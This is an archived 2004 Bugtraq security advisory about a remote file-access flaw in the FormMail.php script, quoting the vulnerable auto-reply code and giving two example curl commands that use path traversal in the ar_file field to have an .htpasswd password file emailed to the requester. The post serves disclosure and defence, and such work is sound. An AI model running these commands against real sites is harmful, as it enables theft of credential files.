Bugtraq mailing list archives
Jacks FormMail.php remote file access vulnerability
From: Hack Hawk <hh () hackhawk net>
Date: 31 Dec 2004 15:06:38 -0800
Security Advisory Vendor: Jack (Jack's Scripts) Date: 31-Dec-2004 Script: FormMail.php Site: http://dtheatre.com/scripts/formmail.php Type: Remote Severity: High Version: 5.0 (maybe others) Script Overview: Jacks FormMail.php script is a simple PHP script that allows web site owners to easily email form values to themselves without much work or scripting knowledge. Problem: The script currently accepts an auto-reply variable (ar_file) that specifies a filepath to send to the person submitting the form. The problem is that this variable can be defined by the person submitting the form and can be used to have arbitrary server files sent to that person. I found this vulnerability because someone used the attack against a customer of mine. Because this is being used in the wild, I'm posting immediately to BUGTRAQ without waiting for Jack to fix the script. Solution: Remove the following code from the FormMail.php script. ------------------------------------------------------ if (file_exists($ar_file)) { $fd = fopen($ar_file, "rb"); $ar_message = fread($fd, filesize($ar_file)); fclose($fd); mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE: Form Submission", ($ar_from)?$ar_from:$recipient, $email); } ------------------------------------------------------ Example Attack: Assume the following Script Location : http://yoursite.com/cgi-bin/formmail.php Password File Location : http://yoursite.com/members/.htpasswd Use the following curl command to have the password file emailed to you. # curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d email=you () yoursite com http://yoursite.com/cgi-bin/formmail.php Depending on permission settings, the .htpasswd could be compromised, even if it is outside of the html folder as in the following example. # curl -e http://yoursite.com/ -d ar_file=../../.htpasswd -d email=you () yoursite com http://yoursite.com/cgi-bin/formmail.php
Current thread:
- Jacks FormMail.php remote file access vulnerability Hack Hawk (Jan 01)